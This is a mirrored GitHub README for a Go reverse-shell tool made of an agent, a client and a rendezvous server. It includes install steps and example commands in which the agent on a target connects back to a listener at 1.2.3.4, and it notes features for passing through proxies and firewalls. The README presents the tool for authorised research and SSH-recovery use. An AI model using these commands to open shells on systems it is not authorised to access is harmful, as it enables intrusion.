Giters

madwind76 / reverse-shell

A reverse-shell agent, master and rendezvous point written in Go

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

A simple reverse-shell written in Go

Build Status Code Coverage

Disclaimer: This project is for research purposes only, and should only be used on authorized systems.

Introduction

"A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved." (source)

A reverse shell is also really useful when you're playing with your SSH server and want to have a backup plan in case of misconfiguration.

Of course the simplest and most portable way is to use Netcat.

Here is a some features of this Go implementation:

  • good portability
  • can cross most proxies and firewalls with default configuration (using websockets, on https, on standard ports)
  • auto-reconnection
  • supports having multiple shells running on a single agent

This projects contains 3 applications that help you setting and interacting with remote shells:

  • an agent to be started on the server where you want to open a shell
  • a client waiting for agent connections and that allow you to interact with the shells
  • a rendezvous application providing a central point where agents and clients meet when a direct connection is not possible/wanted (not mandatory)

Installation

Download the binaries

curl -O -L -s /dev/null https://github.com/maxlaverse/reverse-shell/releases/download/v0.0.1/reverse-shell-0.0.1-linux-amd64.tar.gz | tar xvz

Or build from source

$ git clone https://github.com/maxlaverse/reverse-shell
$ cd reverse-shell && make

Example of usage

Direct, with TCP:

# On the client (1.2.3.4)
$ nc 1.2.3.4 7777

# On the target
$ reverse-shell-agent tcp --host=1.2.3.4 --port=7777

Direct with Websockets:

# On the client (1.2.3.4)
$ reverse-shell-client listen --port=7777

# On the target
$ reverse-shell-agent websocket --url=http://1.2.3.4:7777

With a rendezvous:

# On the rendezvous (1.2.3.4)
$  reverse-shell-rendezvous --port=7777

# On the target
$ reverse-shell-agent websocket --url=http://1.2.3.4:7777

# On the client
$ reverse-shell-client rendezvous list-agents --url=http://1.2.3.4:7777
List of agents:
* 3.4.5.6:65000

# Create a session
$ reverse-shell-client rendezvous create-session --url=http://1.2.3.4:7777 3.4.5.6:65000

The complete usage is available for each component:

Todo

  • add scp-like commands
  • improve logging messages
  • read variables from environment
  • have agent send its IP and rendez vous showing the proxy client one

About

A reverse-shell agent, master and rendezvous point written in Go

Languages

Language:Go 97.6%Language:Makefile 2.4%